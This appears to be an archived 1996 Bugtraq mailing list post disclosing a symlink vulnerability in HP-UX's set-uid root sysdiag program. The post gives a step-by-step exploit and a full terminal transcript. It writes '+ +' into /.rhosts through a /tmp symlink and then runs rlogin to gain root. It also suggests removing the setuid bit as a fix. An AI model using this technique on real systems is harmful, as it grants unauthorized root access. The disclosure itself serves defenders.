From proff Wed Sep 25 15:02:23 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id PAA11853 for best-of-security; Wed, 25 Sep 1996 15:02:21 +1000 Received: (sendmail@localhost) by suburbia.net (8.7.4/Proff-950810) id HAA20118; Wed, 25 Sep 1996 07:17:03 +1000 Received: from UNKNOWN(128.148.157.143), claiming to be "brimstone.netspace.org" via SMTP by suburbia.net, id smtpd20114aaa; Tue Sep 24 21:16:14 1996 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <22906-20865>; Tue, 24 Sep 1996 17:05:43 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA29151; Tue, 24 Sep 1996 17:03:40 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 513049 for BUGTRAQ@NETSPACE.ORG; Tue, 24 Sep 1996 16:55:31 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id PAA22015 for ; Tue, 24 Sep 1996 15:47:24 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from nova.umuc.edu (nova.umuc.edu [131.171.11.11]) by netspace.org (8.7/8.6.12) with ESMTP id XAA30635 for ; Sat, 21 Sep 1996 23:59:50 -0400 Received: from nova [131.171.11.11] ("nova") by nova.umuc.edu (8.7.6/16.2) with SMTP; id XAA16079 Sat, 21 Sep 1996 23:59:45 -0400 (EDT) X-Mailer: Mozilla 3.0b6Gold (Win16; I) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Approved-By: "John W. Jacobi" Message-ID: <3244E32A.6093@pop500.gsfc.nasa.gov> Date: Sat, 21 Sep 1996 23:56:42 -0700 Reply-To: jjacobi@pop500.gsfc.nasa.gov Sender: Bugtraq List From: "John W. Jacobi" Subject: Vunerability in HP sysdiag ? To: Multiple recipients of list BUGTRAQ Approved: proff@suburbia.net Hi all, If this is out, I apologize. Subject: Vunerability in HP sysdiag ??? Program and Systems that I did this on: The sysdiag program on HP 9000/700/HPUX9.05 (has PHSS_7587) HP 9000/800/HPUX9.04 (not sure of patch regarding diags) To Prevent: For now, turn off the set uid on the programs involved. This is how it worked for me, perhaps you too: Problem: Basically, the sysdiag stuff is set-uid root. You can exploit that feature to create and write stuff to arbitrary files on the system as root, while not being root. If the target file you want to create exists, this doesn't work. Perhaps there is a way around that, but that ain't the point. The point is that I used this to get root in 30 seconds on my HP's and that's not good. Heck, this is probably faster then asking for the root password !!! More on the problem: What happens is that a feature exists to create a log file of your sysdiag session that can be invoked while in the program. You give it the name of the file to create, and if it is a sym link to a non-existant file, sysdiag follows the sym link and creates the file as root for you and logs your session in it. To show a typical vunerability, I created /.rhosts from a sym link in /tmp that sysdiag followed and then caused sysdiag to echo the line "+ +" in to the file. Then I could rlogin as root. If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick to create and put a "+ +" in either of those files. That's an easy way to become root or someone else. You can do other files as well. This ain't cool, at all... How I tested this on my system: 1. I logged in with my regular account 2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile 3. I ran the command: /bin/sysdiag 4. From the DUI> prompt I typed: outfile /tmp/f1 5. From the DUI> prompt I typed: + + 6. From the DUI> prompt I typed: redo 7. When my previous command echoed to the screen I pressed . 8. From the DUI> prompt I typed: exit 9. Now at the shell prompt, and out of sysdiag, I typed: rlogin localhost -l root 10. Once logged in I typed: id and it said I was root... This is the script of my sysdiag session: Script started on Sat Sep 21 23:29:10 1996 $ id uid=1648(jjacobi) gid=999(systems) $ ls -l /tmp total 0 $ ls -l /.rhosts /.rhosts not found $ ln -s /.rhosts /tmp/tempfile $ ls -l /tmp total 2 lrwx--x--x 1 jjacobi systems 8 Sep 21 23:29 tempfile -> /.rhosts $ ls -l /.rhosts /.rhosts not found $ /bin/sysdiag ***************************************************************** ****** ****** ****** ONLINE DIAGNOSTIC SYSTEM ****** ****** ****** ****** (C) Copyright Hewlett Packard Co. ****** ****** 1987, 1989, 1990, 1992 ****** ****** All Rights Reserved ****** ****** ****** ****** DUI Version A.02.24 ****** ****** Diagnostic Monitor Version A.02.19 ****** ****** ****** ***************************************************************** Type "HELP" for assistance. DUI >outfile /tmp/tempfile DUI >+ + ^ *** SYNTAX ERROR (DUISERR 501) DUI >redo + + DUI >+ + ^ *** SYNTAX ERROR (DUISERR 501) DUI >exit $ ls -l /tmp total 2 lrwx--x--x 1 jjacobi systems 8 Sep 21 23:29 tempfile -> /.rhosts $ ls -l /.rhosts -rw------- 1 root systems 891 Sep 21 23:29 /.rhosts $ id uid=1648(jjacobi) gid=999(systems) $ rlogin localhost -l root Please wait...checking for disk quotas Value of TERM has been set to "vt100". # id uid=0(root) gid=3(sys) # cat /.rhosts DUI >+ + ^ *** SYNTAX ERROR (DUISERR 501) DUI >redo + + DUI >+ + ^ *** SYNTAX ERROR (DUISERR 501) DUI >exit # exit logout root Connection closed. $ id uid=1648(jjacobi) gid=999(systems) $ exit script done on Sat Sep 21 23:30:38 1996 You have reached the end of my message, thank you for reading it. John W. Jacobi